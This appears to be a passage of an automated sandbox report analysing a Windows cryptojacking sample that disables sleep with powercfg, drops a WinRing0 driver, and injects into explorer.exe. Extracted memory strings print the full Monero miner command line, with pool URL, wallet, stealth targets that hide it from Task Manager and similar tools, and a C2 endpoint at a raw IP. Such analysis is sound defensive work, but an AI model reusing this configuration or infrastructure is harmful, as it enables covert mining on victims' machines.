        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Users\user\Desktop\88aext0k.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: 88aext0k.exeReversingLabs: Detection: 73%
        Source: unknownProcess created: C:\Users\user\Desktop\88aext0k.exe "C:\Users\user\Desktop\88aext0k.exe"
        Source: C:\Users\user\Desktop\88aext0k.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        Source: C:\Users\user\Desktop\88aext0k.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\88aext0k.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\88aext0k.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\88aext0k.exeProcess created: C:\Windows\explorer.exe explorer.exe
        Source: C:\Users\user\Desktop\88aext0k.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
        Source: C:\Users\user\Desktop\88aext0k.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
        Source: C:\Users\user\Desktop\88aext0k.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
        Source: C:\Users\user\Desktop\88aext0k.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
        Source: C:\Users\user\Desktop\88aext0k.exeProcess created: C:\Windows\explorer.exe explorer.exeJump to behavior
        Source: C:\Users\user\Desktop\88aext0k.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
        Source: 88aext0k.exeStatic PE information: Image base 0x140000000 > 0x60000000
        Source: 88aext0k.exeStatic file information: File size 5168640 > 1048576
        Source: 88aext0k.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x4e5600
        Source: 88aext0k.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: 88aext0k.exe, 00000000.00000003.2059971991.0000013D8D7C0000.00000004.00000001.00020000.00000000.sdmp, ztaigjkbyfjh.sys.0.dr
        Source: 88aext0k.exeStatic PE information: section name: .00cfg

        Persistence and Installation Behavior

        barindex
        Source: C:\Users\user\Desktop\88aext0k.exeFile created: C:\Users\user\AppData\Local\Temp\ztaigjkbyfjh.sysJump to behavior
        Source: C:\Users\user\Desktop\88aext0k.exeFile created: C:\Users\user\AppData\Local\Temp\ztaigjkbyfjh.sysJump to dropped file
        Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformationJump to behavior
        Source: explorer.exe, 00000009.00000003.2075334619.00000000006A4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4533205171.0000000000671000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
        Source: explorer.exe, 00000009.00000003.2063381261.0000000000672000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEHTTP://185.215.113.217/DELIBERATE/API/ENDPOINT.PHPVDXNEBOAFWEVUFEV
        Source: explorer.exe, 00000009.00000002.4533205171.0000000000656000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE,
        Source: explorer.exe, 00000009.00000003.2075334619.00000000006A4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4533205171.0000000000671000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEC
        Source: explorer.exe, 00000009.00000002.4533205171.0000000000656000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
        Source: explorer.exe, 00000009.00000003.2075334619.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4533205171.0000000000671000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE0 @ 2.40 GHZR
        Source: explorer.exe, 00000009.00000002.4533205171.0000000000656000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EXPLORER.EXE--ALGO=RX/0--URL=XMR-US-WEST1.NANOPOOL.ORG:10300--USER=86BLUJ7ODUF2WU65EHO3KWC6FBM8X4BGHXVGRKRH5WZVKGTF4TFQRWTMJ2QTAE4MU7P2KDWNGPZRGPD3CKGENXVGMT5R4SP--PASS=X--CPU-MAX-THREADS-HINT=20--CINIT-WINRING=ZTAIGJKBYFJH.SYS--RANDOMX-NO-RDMSR--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-STEALTH-FULLSCREEN--CINIT-API=HTTP://185.215.113.217/DELIBERATE/API/ENDPOINT.PHP--CINIT-VERSION=3.4.1--CINIT-IDLE-WAIT=5--CINIT-IDLE-CPU=80--CINIT-ID=VDXNEBOAFWEVUFEV
        Source: explorer.exe, 00000009.00000002.4533205171.0000000000656000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --ALGO=RX/0 --URL=XMR-US-WEST1.NANOPOOL.ORG:10300 --USER="86BLUJ7ODUF2WU65EHO3KWC6FBM8X4BGHXVGRKRH5WZVKGTF4TFQRWTMJ2QTAE4MU7P2KDWNGPZRGPD3CKGENXVGMT5R4SP" --PASS="X" --CPU-MAX-THREADS-HINT=20 --CINIT-WINRING="ZTAIGJKBYFJH.SYS" --RANDOMX-NO-RDMSR --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-API="HTTP://185.215.113.217/DELIBERATE/API/ENDPOINT.PHP" --CINIT-VERSION="3.4.1" --CINIT-IDLE-WAIT=5 --CINIT-IDLE-CPU=80 --CINIT-ID="VDXNEBOAFWEVUFEV"
        Source: explorer.exe, 00000009.00000002.4533205171.0000000000656000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE|
        Source: explorer.exe, 00000009.00000003.2075334619.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2063381261.0000000000672000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2075334619.00000000006A4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4533205171.0000000000656000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4533205171.0000000000671000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
        Source: C:\Users\user\Desktop\88aext0k.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ztaigjkbyfjh.sysJump to dropped file
        Source: C:\Windows\explorer.exe TID: 6568Thread sleep count: 65 > 30Jump to behavior
        Source: C:\Windows\explorer.exe TID: 6568Thread sleep count: 76 > 30Jump to behavior
